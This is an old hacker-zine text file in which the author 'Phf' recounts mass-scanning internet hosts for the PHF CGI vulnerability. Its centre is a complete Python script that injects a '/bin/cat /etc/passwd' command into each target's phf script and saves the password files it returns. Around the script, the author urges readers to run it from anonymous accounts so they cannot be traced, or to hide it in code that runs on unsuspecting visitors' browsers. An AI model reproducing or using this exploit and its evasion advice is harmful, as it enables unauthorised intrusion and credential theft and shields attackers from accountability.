ExploiteD!
By Phf

It was a cold November afternoon and I had grown bored with my fungoidal pleasures. So I opened up the latest issue of 2600 mag and began reading. Contained therein was the insideous Phf script written in python. I fired up my linux box and banged in the script, only to find that I hadn't installed python. A quick file grab from sunsite and it was up and running, now only if I could find a good list of internet addresses.

Boing! Like an early morning pee-on, I quickly ftp'd out to internic and nabbed the zone files. After a liberal application of the cut util, a sort and a uniq, I had a clean, usable list. With great expectations I fired up the script and was disappointed to find that it didn't work with the latest version of python.

The following is a slightly modified version that I managed to make work, mind you I removed all the other pre appends that appear in the original and should you find yourself with a lan connection to the net, feel free to put 'em back in.

For your enjoyment and absolute incrimination, here is said script...

<cut here>

#!/usr/local/bin/python
combos=' ','www.'
import string
import urllib
import os
def convert_link(link):
 temp=" "
 for u in link:
  if u== '.':
   u='_'
 temp = temp+u
 return temp
filename=raw_input("Filename to use? ")
logfilename=raw_input("Logfile to use? ")
output_path=raw_input("Out PutPath with trailing BackSlash ")

hostfile=open(filename,'r')
logfile=open(logfilename,'a')
flag=0
while not flag:
 link=string.strip(hostfile.readline())
 if link!=' ':
  for u in combos:
   thislink=u+link
   print "Trying host :"+thislink
   try:
    tempfile=urllib.urlretrieve("http://"+thislink+"/cgi-bin/phf?Jserver="\
    +"thislink%0A/bin/cat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Q"\
    +"nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhighschool=&Q"\
    +"slip=HTTP/1.0")
   except:
    print "Host "+thislink+" error connecting"
    logfile.write("error connecting: ")
   try:
    os.rename(tempfile[0], output_path+thislink)
   except:
    print "tempfile dosnt exist"
   logfile.write(thislink+"\r\n")
if link==' ':
 flag=1

<stop cut here>

 

Now for the retch of the story...

The script worked like a charm, site after site was hit, over and over again it logged the results... some contained useful information... password philes and such. But one, my little spores, contained a message for the user of the PHF exploit.

Your attempt to hack this system has been logged, CERT will be advised. Furthermore the SysAdmin at <ip address that you are coming from> will be contacted. Blah Blah Blah.

Apparently some sadistic fuck of a sysadmin had replaced his phf bin with a perl script to rape us poor little explorers of the back waters of the internet. At first I thought, "Hey it's just a message to scare people away..." But no no, my droogies... it was for real, for my sysadmin was contacted and I was raked over the coals, with the threat of losing my pre-paid six month account.

Fortunately for me, PB at compusmart, was understanding and let me off with a warning... And with this little page, I too warn you of the dangers of hacking from your own account. Should you wish to run the Phf exploit across the entire collection of i-net addresses, be warned... do it from a free service that doesn't care who you are. Or better yet, code it in Java and have it run on other peoples browsers after they connect to your cool Warez page.

Source soon to come <grin>...

<eof> Phungus Out...